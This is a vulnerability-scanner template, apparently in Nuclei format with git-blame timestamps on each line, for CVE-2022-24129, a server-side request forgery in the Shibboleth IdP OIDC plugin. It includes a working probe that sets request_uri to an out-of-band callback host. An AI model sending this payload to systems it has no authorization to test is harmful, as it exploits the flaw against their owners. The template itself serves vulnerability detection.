2022-07-04 21:02:41 +00:00
id : CVE-2022-24129
info :
2022-07-26 13:45:11 +00:00
name : Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery
2022-07-04 21:02:41 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
2022-07-04 21:02:41 +00:00
reference :
- https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
2022-07-05 02:39:14 +00:00
- https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
2022-07-05 02:53:12 +00:00
- http://shibboleth.net/community/advisories/
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-24129
2022-07-04 21:02:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score : 8.2
cve-id : CVE-2022-24129
cwe-id : CWE-918
2022-07-05 02:39:14 +00:00
tags : cve,cve2022,ssrf,oidc,shibboleth
2022-07-04 21:02:41 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
2022-07-05 02:39:14 +00:00
matchers-condition : and
2022-07-04 21:02:41 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-07-05 02:39:14 +00:00
- type : word
part : interactsh_request
words :
- "ShibbolethIdp"
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/15